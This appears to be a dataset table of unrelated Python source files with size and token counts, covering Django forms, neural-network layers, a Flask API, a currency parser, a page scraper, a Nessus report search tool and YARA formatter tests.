text string | size int64 | token_count int64 |
|---|---|---|
'''
The MIT License (MIT)
Copyright (c) 2014 NTHUOJ team
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
'''
import datetime
from django import forms
from django.views.generic.edit import UpdateView
from contest.models import Contest
from contest.models import Clarification
from contest.contest_info import get_freeze_time_datetime
from users.models import User
from datetimewidget.widgets import DateTimeWidget, DateWidget, TimeWidget
from problem.models import Problem
from django.db.models import Q
class ContestForm(forms.ModelForm):
dateTimeOptions = {
'format': 'yyyy-mm-dd hh:ii:00',
'todayBtn': 'true',
'minuteStep': 1,
}
start_time = forms.DateTimeField(
widget=DateTimeWidget(options=dateTimeOptions, bootstrap_version=3))
end_time = forms.DateTimeField(
widget=DateTimeWidget(options=dateTimeOptions, bootstrap_version=3))
def __init__(self, *args, **kwargs):
super(ContestForm, self).__init__(*args, **kwargs)
# access object through self.instance...
initial = kwargs.get('initial', {})
user = initial.get('user', User())
owner = initial.get('owner', User())
method = initial.get('method', '')
self.fields['coowner'].queryset = User.objects.exclude(
Q(user_level=User.USER) | Q(pk=owner))
if method == 'GET':
contest_id = initial.get('id', 0)
# if user not is admin
# get all problem when user is admin
if not user.has_admin_auth():
# edit contest
if contest_id:
contest = Contest.objects.get(pk=contest_id)
contest_problems = contest.problem.all().distinct()
self.fields['problem'].queryset = Problem.objects.filter(
Q(visible=True) | Q(owner=user)).distinct() | contest_problems
# create contest
else:
self.fields['problem'].queryset = Problem.objects.filter(
Q(visible=True) | Q(owner=user))
elif method == 'POST':
self.fields['problem'].queryset = Problem.objects.all()
class Meta:
model = Contest
fields = (
'cname',
'owner',
'coowner',
'start_time',
'end_time',
'freeze_time',
'problem',
'is_homework',
'open_register',
)
def clean_freeze_time(self):
start_time = self.cleaned_data.get("start_time")
freeze_time = self.cleaned_data.get("freeze_time")
end_time = self.cleaned_data.get("end_time")
if type(end_time) is datetime.datetime:
if end_time - datetime.timedelta(minutes=freeze_time) <= start_time:
raise forms.ValidationError(
"Freeze time cannot longer than Contest duration.")
return freeze_time
def clean_end_time(self):
start_time = self.cleaned_data.get("start_time")
end_time = self.cleaned_data.get("end_time")
if end_time <= start_time:
raise forms.ValidationError(
"End time cannot be earlier than start time.")
return end_time
class ClarificationForm(forms.ModelForm):
def __init__(self, *args, **kwargs):
super(ClarificationForm, self).__init__(*args, **kwargs)
# only problems contest contains will be shown in list
initial = kwargs.get('initial', {})
contest = initial.get('contest', {})
if type(contest) is Contest:
contest_id = contest.id
the_contest = Contest.objects.get(id=contest_id)
self.fields['problem'] = forms.ChoiceField(choices=[(problem.id, problem.pname)
for problem in the_contest.problem.all()])
class Meta:
model = Clarification
fields = (
'contest',
'problem',
'content',
'asker',
)
widgets = {
'content': forms.Textarea(),
}
class ReplyForm(forms.ModelForm):
def __init__(self, *args, **kwargs):
super(ReplyForm, self).__init__(*args, **kwargs)
# only problems contest contains will be shown in list
initial = kwargs.get('initial', {})
contest = initial.get('contest', {})
if type(contest) is Contest:
clarifications = Clarification.objects.filter(contest=contest)
self.fields['clarification'] = forms.ChoiceField(
choices=[(clarification.id, clarification.content)
for clarification in clarifications.all()])
class Meta:
model = Clarification
fields = (
'reply',
'replier',
'reply_time',
'reply_all'
)
widgets = {
'reply': forms.Textarea(),
}
| 6,013 | 1,690 |
"""
Wrapper to save the training data to different file formats
"""
class GenericFileWriter(object):
"""
Write data to different file formats depending on the open_file and write_file functions
"""
def __init__(self, open_file=None, write_file=None):
self.open_file = open_file
self.write_file = write_file
def __enter__(self):
self.f = self.open_file()
self.f.__enter__()
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.f.__exit__(exc_type, exc_val, exc_tb)
def write(self, data):
self.write_file(self.f, data)
| 618 | 196 |
# Generated by Django 2.2 on 2020-03-30 14:01
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('users', '0006_auto_20200330_2200'),
]
operations = [
migrations.AlterField(
model_name='boughtproduct',
name='quantity',
field=models.IntegerField(default=0, verbose_name='ไบงๅๆฐ้'),
),
migrations.AlterField(
model_name='shoppingcart',
name='quantity',
field=models.IntegerField(default=0, verbose_name='ไบงๅๆฐ้'),
),
migrations.AlterField(
model_name='traderecord',
name='quantity',
field=models.IntegerField(default=0, verbose_name='ไบงๅๆฐ้'),
),
]
| 772 | 255 |
""" Copyright (c) 2017-2020 ABBYY Production LLC
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
--------------------------------------------------------------------------------------------------------------*/
"""
import neoml.PythonWrapper as PythonWrapper
from .Dnn import Layer
from neoml.Utils import check_input_layers
class ImageResize(Layer):
"""The layer that resizes a set of two-dimensional multi-channel images.
Layer inputs
----------
#1: a set of images, of the dimensions:
- BatchLength * BatchWidth * ListSize - the number of images
- Height - the images' height
- Width - the images' width
- Depth * Channels - the number of channels the image format uses
Layer outputs
----------
#1: a blob with the resized images, of the dimensions:
- BatchLength, BatchWidth, ListSize, Depth, Channels are
equal to the input dimensions
- Height is the input Height plus the sum of top and bottom deltas
- Width is the input Width plus the sum of right and left deltas
Parameters
----------
input_layer : (object, int)
The input layer and the number of its output. If no number
is specified, the first output will be connected.
deltas : ("left", "right", "top", "bottom")
The differences between the original and the resized image,
on each side. If the difference is negative, rows or columns are
removed from the specified side. If it is positive, rows or
columns are added and filled with the default_value pixels.
default_value : float, default=0.0
The value for the added pixels.
name : str, default=None
The layer name.
"""
def __init__(self, input_layer, deltas, default_value=0.0, name=None):
if type(input_layer) is PythonWrapper.ImageResize:
super().__init__(input_layer)
return
layers, outputs = check_input_layers(input_layer, 1)
if len(deltas) != 4:
raise ValueError('The `deltas` must contain 4 elements.')
internal = PythonWrapper.ImageResize(str(name), layers[0], int(outputs[0]), int(deltas[0]), int(deltas[1]), int(deltas[2]), int(deltas[3]), default_value)
super().__init__(internal)
@property
def deltas(self):
"""Gets the size differences on each side.
"""
return self._internal.get_deltas()
@deltas.setter
def deltas(self, deltas):
"""Sets the size differences on each side.
"""
if len(deltas) != 4:
raise ValueError('The `deltas` must contain 4 elements.')
self._internal.set_deltas(deltas)
@property
def default_value(self):
"""Gets the default value for new pixels.
"""
return self._internal.get_default_value()
@default_value.setter
def default_value(self, default_value):
"""Sets the default value for new pixels.
"""
self._internal.set_default_value(default_value)
# ----------------------------------------------------------------------------------------------------------------------
class PixelToImage(Layer):
"""The layer that creates a set of two-dimensional images using a set of
pixel sequences with specified coordinates.
Layer inputs
----------
#1: a blob with pixel sequences.
The dimensions:
- BatchLength is 1
- BatchWidth is the number of sequences in the set
- ListSize is the length of each sequence
- Height, Width, Depth are 1
- Channels is the number of channels for the pixel sequences
and the output images.
#2: a blob with integer data that contains lists of pixel coordinates.
The dimensions:
- BatchWidth, ListSize are the same as for the first input
- the other dimensions are 1
Layer outputs
----------
#1: a blob with images.
The dimensions:
- BatchLength is 1
- BatchWidth is the same as for the first input
- ListSize is 1
- Height is the specified image height
- Width is the specified image width
- Depth is 1
- Channels is the same as for the first input
Parameters
----------
input_layer : (object, int)
The input layer and the number of its output. If no number
is specified, the first output will be connected.
height : int
The height of the resulting images.
width : int
The width of the resulting images.
name : str, default=None
The layer name.
"""
def __init__(self, input_layer, height, width, name=None):
if type(input_layer) is PythonWrapper.PixelToImage:
super().__init__(input_layer)
return
if height < 1:
raise ValueError('The `height` must be > 0.')
if width < 1:
raise ValueError('The `width` must be > 0.')
layers, outputs = check_input_layers(input_layer, 2)
internal = PythonWrapper.PixelToImage(str(name), layers[0], int(outputs[0]), layers[1], int(outputs[1]), int(height), int(width))
super().__init__(internal)
@property
def height(self):
"""Gets the output image height.
"""
return self._internal.get_height()
@height.setter
def height(self, height):
"""Sets the output image height.
"""
if height < 1:
raise ValueError('The `height` must be > 0.')
self._internal.set_height(height)
@property
def width(self):
"""Gets the output image width.
"""
return self._internal.get_width()
@width.setter
def width(self, width):
"""Sets the output image width.
"""
if width < 1:
raise ValueError('The `width` must be > 0.')
self._internal.set_width(width)
# ----------------------------------------------------------------------------------------------------------------------
class ImageToPixel(Layer):
"""The layer that extracts a set of pixel sequences along the specified
coordinates from a set of two-dimensional images.
Layer inputs
----------
#1: a set of two-dimensional images.
The blob dimensions:
- BatchLength is 1
- BatchWidth is the number of sequences in the set
- ListSize 1
- Height is the images' height
- Width is the images' width
- Depth is 1
- Channels is the number of channels the image format uses
#2: a blob with integer data that contains the pixel sequences.
The dimensions:
- BatchWidth is the same as for the first input
- ListSize is the length of each sequence
- all other dimensions are 1
Layer outputs
----------
#1: a blob with the pixel sequences.
The dimensions:
- BatchLength is 1
- BatchWidth is the inputs' BatchWidth
- ListSize is the same as for the second input
- Height, Width, Depth are 1
- Channels is the same as for the first input
Parameters
----------
input_layer : (object, int)
The input layer and the number of its output. If no number
is specified, the first output will be connected.
name : str, default=None
The layer name.
"""
def __init__(self, input_layer, name=None):
if type(input_layer) is PythonWrapper.ImageToPixel:
super().__init__(input_layer)
return
layers, outputs = check_input_layers(input_layer, 2)
internal = PythonWrapper.ImageToPixel(str(name), layers[0], layers[1], int(outputs[0]), int(outputs[1]))
super().__init__(internal)
| 8,087 | 2,249 |
import time
import random
import pyson
content = """
{
"time" : time.time(),
random.randint(0, 1) : "a random number",
"another_level" : {
"test" : 5
},
"main level" : True
}
"""
print(pyson.loads(content, globals(), locals())) | 237 | 99 |
import pandas as pd
import numpy as np
def rsi_tradingview(ohlc: pd.DataFrame, period):
delta = ohlc["close"].diff()
up = delta.copy()
up[up < 0] = 0
up = pd.Series.ewm(up, alpha=1/period).mean()
down = delta.copy()
down[down > 0] = 0
down *= -1
down = pd.Series.ewm(down, alpha=1/period).mean()
rsi = np.where(up == 0, 0, np.where(down == 0, 100, 100 - (100 / (1 + up / down))))
ohlc["RSI"] = rsi
return ohlc
def WMA(s, period):
return s.rolling(period).apply(lambda x: ((np.arange(period) + 1) * x).sum() / (np.arange(period) + 1).sum(), raw=True)
def HMA(s, period):
return WMA(WMA(s, period // 2).multiply(2).sub(WMA(s, period)), int(np.sqrt(period))) | 716 | 310 |
# -*- coding: utf-8 -*-
"""
This module extends the default output formatting to include HTML.
"""
import sys
import datetime
from jinja2 import Template
def html_output(source, header, thresholds):
source_file_dict = {"filename": source.filename}
func_list = []
for source_function in source.function_list:
if source_function:
source_function_dict = source_function.__dict__
func_list.append(source_function_dict)
source_file_dict["functions"] = func_list
with open("./assets/report.html") as f:
output = Template(f.read()).render(
header=header,
date=datetime.datetime.now().strftime("%Y-%m-%d %H:%M"),
thresholds=thresholds,
argument=source_file_dict,
)
return output
| 808 | 233 |
#!/usr/bin/env python
# -*- coding:utf-8 -*-
import NLP
def calculate(tags):
tmp_str = " ".join(str(val) for val in tags)
tmp_tags = NLP.calculate_also_pos(tmp_str)
print(tmp_tags)
lst_query = ["USD", "KRW"]#๊ธฐ๋ณธ ์๋ฌ๋ฌ ํ์จ๋ก ์ด๊ธฐํ
str_humanize = ["๋ฌ๋ฌ", "์"]#๊ธฐ๋ณธ ์๋ฌ๋ฌ ํ์จ๋ก ์ด๊ธฐํ
indicator = 0
cursor = 0
value_of_currency = 1
multiplier = 1
for idx, val in enumerate(tmp_tags):
if val[1] == "Number":
if (idx - cursor) < 2:
value_of_currency = float(val[0])
if (idx - cursor) < 3:
if val[0] == "์ญ":
multiplier = 10
cursor = idx
if val[0] == "๋ฐฑ":
multiplier = 100
cursor = idx
if val[0] == "์ฒ":
multiplier = 1000
cursor = idx
if val[0] == "๋ง":
multiplier = 10000
cursor = idx
if val[0] == "์ญ๋ง":
multiplier = 100000
cursor = idx
if val[0] == "๋ฐฑ๋ง":
multiplier = 1000000
cursor = idx
if val[0] == "์ฒ๋ง":
multiplier = 10000000
cursor = idx
if val[0] == "์ต":
multiplier = 100000000
cursor = idx
if val[0] == "์ญ์ต":
multiplier = 1000000000
cursor = idx
if (val[0] == "์") or (val[0] == "์ํ") or (val[0] == "KRW"):
str_humanize[indicator] = "์"
lst_query[indicator] = "KRW"
cursor = idx
indicator += 1
elif val[0] == "์ญ์":
str_humanize[indicator] = "์"
lst_query[indicator] = "KRW"
cursor = idx
multiplier = 10
indicator += 1
elif val[0] == "๋ฐฑ์":
str_humanize[indicator] = "์"
lst_query[indicator] = "KRW"
cursor = idx
multiplier = 100
indicator += 1
elif val[0] == "์ฒ์":
str_humanize[indicator] = "์"
lst_query[indicator] = "KRW"
cursor = idx
multiplier = 1000
indicator += 1
elif val[0] == "๋ง์":
str_humanize[indicator] = "์"
lst_query[indicator] = "KRW"
cursor = idx
multiplier = 10000
indicator += 1
elif val[0] == "์ญ๋ง์":
str_humanize[indicator] = "์"
lst_query[indicator] = "KRW"
cursor = idx
multiplier = 100000
indicator += 1
elif val[0] == "๋ฐฑ๋ง์":
str_humanize[indicator] = "์"
lst_query[indicator] = "KRW"
cursor = idx
multiplier = 1000000
indicator += 1
elif val[0] == "์ฒ๋ง์":
str_humanize[indicator] = "์"
lst_query[indicator] = "KRW"
cursor = idx
multiplier = 10000000
indicator += 1
elif val[0] == "์ต์":
str_humanize[indicator] = "์"
lst_query[indicator] = "KRW"
cursor = idx
multiplier = 100000000
indicator += 1
elif (val[0] == "๋ฌ๋ฌ") or (val[0] == "๋ฌ๋ฌํ"):
str_humanize[indicator] = "๋ฌ๋ฌ"
lst_query[indicator] = "USD"
cursor = idx
indicator += 1
elif (val[0] == "์") or (val[0] == "์ํ") or (val[0] == "JPY"):
str_humanize[indicator] = "์"
lst_query[indicator] = "JPY"
cursor = idx
indicator += 1
elif val[0] == "์ญ์":
str_humanize[indicator] = "์"
lst_query[indicator] = "JPY"
cursor = idx
multiplier = 10
indicator += 1
elif val[0] == "๋ฐฑ์":
str_humanize[indicator] = "์"
lst_query[indicator] = "JPY"
cursor = idx
multiplier = 100
indicator += 1
elif val[0] == "์ฒ์":
str_humanize[indicator] = "์"
lst_query[indicator] = "JPY"
cursor = idx
multiplier = 1000
indicator += 1
elif val[0] == "๋ง์":
str_humanize[indicator] = "์"
lst_query[indicator] = "JPY"
cursor = idx
multiplier = 10000
indicator += 1
elif val[0] == "์ญ๋ง์":
str_humanize[indicator] = "์"
lst_query[indicator] = "JPY"
cursor = idx
multiplier = 100000
indicator += 1
elif val[0] == "๋ฐฑ๋ง์":
str_humanize[indicator] = "์"
lst_query[indicator] = "JPY"
cursor = idx
multiplier = 1000000
indicator += 1
elif val[0] == "์ฒ๋ง์":
str_humanize[indicator] = "์"
lst_query[indicator] = "JPY"
cursor = idx
multiplier = 10000000
indicator += 1
elif (val[0] == "์ ๋ก") or (val[0] == "์ ๋กํ") or (val[0] == "EUR"):
str_humanize[indicator] = "์ ๋ก"
lst_query[indicator] = "EUR"
cursor = idx
indicator += 1
elif (val[0] == "์์") or (val[0] == "์์ํ") or (val[0] == "CNY"):
str_humanize[indicator] = "์์"
lst_query[indicator] = "CNY"
cursor = idx
indicator += 1
to_measure = int(value_of_currency * multiplier)
if (to_measure == 1) and (not indicator <= 1):
str_humanize.reverse()
str_query = lst_query[1] + lst_query[0]
else:
str_query = lst_query[0] + lst_query[1]
return str_query, to_measure, str_humanize
if __name__ == "__main__":
print(calculate(['50', '๋ง์', '์ผ๋ง']))
| 5,733 | 2,048 |
from marshmallow import fields, validate
from .base import BaseSchema
class PageParamSchema(BaseSchema):
page = fields.Integer(required=True, validate=validate.Range(min=1))
| 181 | 52 |
from multiprocessing import Lock
from flask import Flask, request, jsonify
from constants import HOST, PORT
from Database.database import Database
from handler.frontendHandler import frontend_handler
from handler.iotHandler import iot_handler
# Create the flask application
app = Flask(__name__)
db_name = 'test.db'
db_lock = Lock()
# Create a basic route for debugging
@app.route('/')
def index():
"""The homepage for the api
This is for debugging purposes
"""
return '<h1>Hello world</h1>'
# REST for frontend
@app.route('/frontend/<query>', methods=['GET'])
def front_end_get(query):
"""Get data"""
# Get the body and the request type
if not query.isdigit():
return 404
req_body = {'type': int(query)}
req_type = request.method
req_body.update(request.args)
db_lock.acquire(True)
db = Database(db_name)
result = frontend_handler(req_body, req_type, db)
del db
db_lock.release()
return jsonify(result)
@app.route('/frontend', methods=['POST', 'PUT', 'DELETE'])
def frontend():
"""The endpoint for the frontend application to interact with"""
# Get the body and the request type
req_body = request.get_json()
req_type = request.method
db_lock.acquire(True)
db = Database(db_name)
result = frontend_handler(req_body, req_type, db)
del db
db_lock.release()
return jsonify(result)
@app.route('/device', methods = ['GET'])
def iot_get():
req_type = request.method.lower()
result = iot_handler(req_type)
return jsonify(result)
if __name__ == "__main__":
app.run(HOST, PORT)
| 1,617 | 522 |
n = int(input())
result=0
for i in range(1,n+1):
result+=i
print(result) | 76 | 33 |
# Exercรญcio Python 055
# Leia o peso de 5 pessoas, mostre o maior e o menor
maior = 0
menor = 0
for p in range(1, 6):
peso = int(input("Digite o peso:"))
if p == 1: #com o contador na primeira posiรงรฃo, o maior e o menor sรฃo iguais
maior = peso
menor = peso
else:
if peso > maior:
maior = p
if peso < menor:
menor = p
print("O maior valor รฉ:", maior)
print("O menor valor รฉ:", menor)
| 452 | 162 |
from bs4 import BeautifulSoup as bs
from pathlib import Path
import os
import glob
import time
import random
import requests
pwd = os.getcwd()
page_counter = 1
URL = "https://www.example.com/companies/?page="
# Creating 'pages' folder if this one exists deletes it's content
try:
Path(pwd + '/pages').mkdir(parents=True, exist_ok=False)
except FileExistsError:
print("File Already exists, Deleting it's content...")
files = glob.glob(pwd + '/pages/*')
for f in files:
os.remove(f)
time.sleep(5)
while page_counter <= 400:
page = requests.get(URL+str(page_counter))
soup = bs(page.content, "html.parser")
if(page_counter % 10 == 0):
time.sleep(random.randrange(8, 13))
print(page_counter)
with open('pages/'+str(page_counter)+".html", "w", encoding='utf-8') as file:
file.write(str(soup))
page_counter += 1
| 886 | 311 |
import os
from sqlalchemy import create_engine
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import sessionmaker, relationship, backref
Base = declarative_base()
from app.db_models.accounts import Accounts
from app.db_models.association_table import AssociationTable
from app.db_models.organisations import Organisations
from app.db_models.users import User
# We are using ORM from sqlalchemy so that we
# can have a better representation of our relationships
# To avoid overwriting a database
if os.path.exists(str(os.getcwd())+'/x_system_db.db') == False:
engine = create_engine('sqlite:///'+str(os.getcwd()) +'\database.db')
Base.metadata.create_all(bind=engine)
# Connecting to an existing database
engine = create_engine('sqlite:///'+str(os.getcwd())+'/database.db', echo=False)
Session = sessionmaker(bind=engine)
session = Session()
| 892 | 277 |
import numpy as np
from autumn.models.covid_19.detection import create_cdr_function
def test_cdr_intercept():
"""
Test that there is zero case detection when zero tests are performed
"""
for cdr_at_1000_tests in np.linspace(0.05, 0.5, 10):
cdr_function = create_cdr_function(1000.0, cdr_at_1000_tests)
assert cdr_function(0.0) == 0.0
def test_cdr_values():
"""
Test that CDR is always a proportion, bounded by zero and one
"""
for cdr_at_1000_tests in np.linspace(0.05, 0.5, 10):
cdr_function = create_cdr_function(1000.0, cdr_at_1000_tests)
for i_tests in list(np.linspace(0.0, 1e3, 11)) + list(np.linspace(0.0, 1e5, 11)):
assert cdr_function(i_tests) >= 0.0
assert cdr_function(i_tests) <= 1.0
| 791 | 330 |
#!/usr/bin/env python3
# Copyright (c) 2019, Richard Hughes All rights reserved.
# Released under the BSD license. Please see LICENSE.md for more information.
import sys
import os
import argparse
import glob
import xml.dom.minidom
import re
# Define command line arguments
parms=argparse.ArgumentParser()
parms.add_argument("-f", "--file", type=str, required=False, default="*.nessus", help="Specify input file(s)")
parms.add_argument("-c", "--case_sensitive", required=False, action="store_true", help="Case sensitive search")
parms.add_argument("-d", "--debug", required=False, action="store_true", help="Debug output")
parms.add_argument("-o", "--output", type=str, required=False, default="xml_min", choices=['xml','xml_min','ipv4',"mac","mac+ipv4","ports","script"], help="Specify output format")
parms.add_argument("-p", "--path", type=str, required=False, default=".", help="Specify location of file(s)")
parms.add_argument("-r", "--regex", type=str, required=True, help="Search expression")
args = vars(parms.parse_args())
# Globals
errorsexist = False
# Main processing
def main(args):
# If output format is XML then add root element
if args['output'] == "xml":
print("<NessusClientData_v2>")
# Generate list of files and pass for processing
for file in glob.glob(args['path'] + "/" + args['file']):
# Process file if it is not empty
if os.path.getsize(file) > 0:
procFile(file)
# If output format is XML then close root element
if args['output'] == "xml":
print("</NessusClientData_v2>")
if(not args['debug'] and errorsexist): print("\nWARNING: Run with -d to see files that could not be processed", file=sys.stderr)
# Process file
def procFile(file):
global errorsexist
# Parse XML file
try:
doc=xml.dom.minidom.parse(file)
# Verify this is an Nmap output file
if doc.getElementsByTagName("NessusClientData_v2"):
# Compile regular expression
if not args['case_sensitive']:
regexp = re.compile(args['regex'], re.IGNORECASE)
else:
regexp = re.compile(args['regex'])
procDocument(doc,regexp)
else:
if args['debug']: print("WARNING: " + file + " is not a valid Nmap output file", file=sys.stderr)
errorsexist=True
except:
if args['debug']: print("WARNING: Unable to parse " + file, file=sys.stderr)
errorsexist=True
# Process document
def procDocument(doc,regexp):
# Extract hosts
hosts=doc.getElementsByTagName("ReportHost")
for host in hosts:
# Check for regular expression match
if regexp.search(host.toxml()):
# Get host tags
tags=host.getElementsByTagName("tag")
addr_ipv4=""
addr_mac=""
hostname=""
for tag in tags:
tagname=tag.getAttribute("name")
tagvalue=tag.firstChild.data
if tagname == "host-ip": addr_ipv4 = tagvalue
if tagname == "host-fqdn": hostname = tagvalue
# Output minimal XML
if args['output'] == "xml_min":
hostxml=host.toxml()
for m in regexp.finditer(hostxml):
idxStart = m.start(0)
idxStart = hostxml.rfind("<", 0, idxStart)
idxEnd = m.end(0)
print("")
print("Host-FQDN: " + hostname)
print("Host-Addr: " + addr_ipv4)
print("")
print(hostxml[idxStart:idxEnd])
# Output XML
elif args['output'] == "xml":
print(host.toxml())
# Output addresses
if args['output'] == "ipv4" and addr_ipv4 != "": print(addr_ipv4)
if args['output'] == "mac" and addr_mac != "": print(addr_mac)
if args['output'] == "mac+ipv4" and addr_ipv4 != "": print(addr_mac + "|" + addr_ipv4)
# Output port list
if args['output'] == "ports":
ssl_list = []
out_list = []
items=host.getElementsByTagName("ReportItem")
# Discover which ports have SSL/TLS
for item in items:
portid=item.getAttribute("port")
plugin=item.getAttribute("pluginName")
if plugin == "SSL / TLS Versions Supported":
if portid not in ssl_list:
ssl_list.append(portid)
# Get port details from ReportItem elements
for item in items:
portid=item.getAttribute("port")
name=item.getAttribute("svc_name")
if name == "www": name = "http"
tunnel=""
if portid in ssl_list:
tunnel="ssl"
if name == "http" and tunnel == "ssl":
name = "https"
# Regex must be found in portid or service name
if(regexp.search(portid) or regexp.search(name)):
if portid not in out_list:
print(addr_ipv4+"|"+portid+"|"+name+"|"+tunnel+"|open")
out_list.append(portid)
# Output script output
if args['output'] == "script":
items=host.getElementsByTagName("ReportItem")
for item in items:
portid=item.getAttribute("port")
scripts=item.getElementsByTagName("plugin_output")
for script in scripts:
if regexp.search(script.toxml()):
print("")
print("Host-FQDN: " + hostname + ":" + portid)
print("Host-Addr: " + addr_ipv4 + ":" + portid)
print(script.firstChild.data)
if __name__ == '__main__':
# Execute main method
main(args)
| 5,339 | 1,678 |
''' Format Provider Tests '''
from textwrap import dedent
import pytest
from yarals import helpers
from yarals.base import protocol
from yarals.base import errors as ce
# don't care about pylint(protected-access) warnings since these are just tests
# pylint: disable=W0212
@pytest.mark.asyncio
async def test_format(format_options, test_rules, yara_server):
''' Ensure a text edit is provided on format with explicit options '''
expected = dedent("""\
rule Oneline : test
{
strings:
$a = "test"
condition:
$a
}""")
oneline = str(test_rules.joinpath("oneline.yar").resolve())
file_uri = helpers.create_file_uri(oneline)
message = {
"params": {
"textDocument": {"uri": file_uri},
"position": {"line": 29, "character": 12},
"options": format_options
}
}
result = await yara_server.provide_formatting(message, True)
assert len(result) == 1
edit = result[0]
assert isinstance(edit, protocol.TextEdit) is True
assert edit.newText == expected
@pytest.mark.asyncio
async def test_format_default_options(test_rules, yara_server):
''' Ensure a text edit is provided on format with implicit options '''
expected = dedent("""\
rule Oneline : test
{
strings:
$a = "test"
condition:
$a
}""")
oneline = str(test_rules.joinpath("oneline.yar").resolve())
file_uri = helpers.create_file_uri(oneline)
message = {
"params": {
"textDocument": {"uri": file_uri},
"position": {"line": 29, "character": 12}
}
}
result = await yara_server.provide_formatting(message, True)
assert len(result) == 1
edit = result[0]
assert isinstance(edit, protocol.TextEdit) is True
assert edit.newText == expected
@pytest.mark.asyncio
async def test_format_alt_tabsize(test_rules, yara_server):
''' Ensure a text edit is provided on format with tabSize set '''
expected = dedent("""\
rule Oneline : test
{
strings:
$a = "test"
condition:
$a
}""")
oneline = str(test_rules.joinpath("oneline.yar").resolve())
file_uri = helpers.create_file_uri(oneline)
message = {
"params": {
"textDocument": {"uri": file_uri},
"position": {"line": 29, "character": 12},
"options": {"tabSize": 2}
}
}
result = await yara_server.provide_formatting(message, True)
assert len(result) == 1
edit = result[0]
assert isinstance(edit, protocol.TextEdit) is True
assert edit.newText == expected
@pytest.mark.asyncio
async def test_format_insert_tabs(test_rules, yara_server):
''' Ensure a text edit is provided that uses tabs instead of spaces '''
expected = dedent("""\
rule Oneline : test
{
strings:
$a = "test"
condition:
$a
}""")
oneline = str(test_rules.joinpath("oneline.yar").resolve())
file_uri = helpers.create_file_uri(oneline)
message = {
"params": {
"textDocument": {"uri": file_uri},
"position": {"line": 29, "character": 12},
"options": {"insertSpaces": False}
}
}
result = await yara_server.provide_formatting(message, True)
assert len(result) == 1
edit = result[0]
assert isinstance(edit, protocol.TextEdit) is True
assert edit.newText == expected
@pytest.mark.skip(reason="not implemented")
@pytest.mark.asyncio
async def test_format_keep_whitespace(test_rules, yara_server):
''' Ensure a text edit is provided with untrimmed whitespace '''
expected = dedent("""\
rule Oneline : test
{
strings:
$a = "test"
condition:
$a
}""")
oneline = str(test_rules.joinpath("oneline.yar").resolve())
file_uri = helpers.create_file_uri(oneline)
# spacing should be preserved
dirty_files = {
file_uri: expected
}
file_uri = helpers.create_file_uri(oneline)
message = {
"params": {
"textDocument": {"uri": file_uri},
"position": {"line": 29, "character": 12},
"options": {"trimTrailingWhitespace": False}
}
}
result = await yara_server.provide_formatting(message, True, dirty_files=dirty_files)
assert len(result) == 1
edit = result[0]
assert isinstance(edit, protocol.TextEdit) is True
assert edit.newText == expected
@pytest.mark.asyncio
async def test_format_insert_newline(test_rules, yara_server):
''' Ensure a text edit is provided with an extra newline inserted '''
expected = dedent("""\
rule Oneline : test
{
strings:
$a = "test"
condition:
$a
}
""")
oneline = str(test_rules.joinpath("oneline.yar").resolve())
file_uri = helpers.create_file_uri(oneline)
message = {
"params": {
"textDocument": {"uri": file_uri},
"position": {"line": 29, "character": 12},
"options": {"insertFinalNewline": True}
}
}
result = await yara_server.provide_formatting(message, True)
assert len(result) == 1
edit = result[0]
assert isinstance(edit, protocol.TextEdit) is True
assert edit.newText == expected
@pytest.mark.asyncio
async def test_format_keep_newlines(test_rules, yara_server):
''' Ensure a text edit is provided with extra newlines '''
expected = dedent("""\
rule Oneline : test
{
strings:
$a = "test"
condition:
$a
}
""")
oneline = str(test_rules.joinpath("oneline.yar").resolve())
with open(oneline) as ifile:
file_uri = helpers.create_file_uri(oneline)
dirty_files = {
file_uri: "%s\n\n\n" % ifile.read()
}
message = {
"params": {
"textDocument": {"uri": file_uri},
"position": {"line": 29, "character": 12},
"options": {"trimFinalNewlines": False}
}
}
result = await yara_server.provide_formatting(message, True, dirty_files=dirty_files)
assert len(result) == 1
edit = result[0]
assert isinstance(edit, protocol.TextEdit) is True
assert edit.newText == expected
@pytest.mark.asyncio
@pytest.mark.xfail(reason="package installation issues")
async def test_format_notify_user(test_rules, uninstall_pkg, yara_server):
''' Ensure the formatter notifies the user if plyara is not installed '''
expected_msg = "plyara is not installed. Formatting is disabled"
oneline = str(test_rules.joinpath("oneline.yar").resolve())
file_uri = helpers.create_file_uri(oneline)
message = {
"params": {
"textDocument": {"uri": file_uri},
"position": {"line": 29, "character": 12}
}
}
await uninstall_pkg("plyara")
with pytest.raises(ce.NoDependencyFound) as excinfo:
await yara_server.provide_formatting(message, True)
assert expected_msg == str(excinfo.value)
@pytest.mark.asyncio
async def test_format_no_imports(test_rules, yara_server):
''' Ensure imports are removed from provided rules. They should not be affected by formatter '''
rulefile = str(test_rules.joinpath("code_completion.yara").resolve())
file_uri = helpers.create_file_uri(rulefile)
message = {
"params": {
"textDocument": {"uri": file_uri},
"position": {"line": 9, "character": 12}
}
}
result = await yara_server.provide_formatting(message, True)
assert len(result) == 3
assert all([isinstance(edit, protocol.TextEdit) for edit in result])
full_text = "\n".join([edit.newText for edit in result])
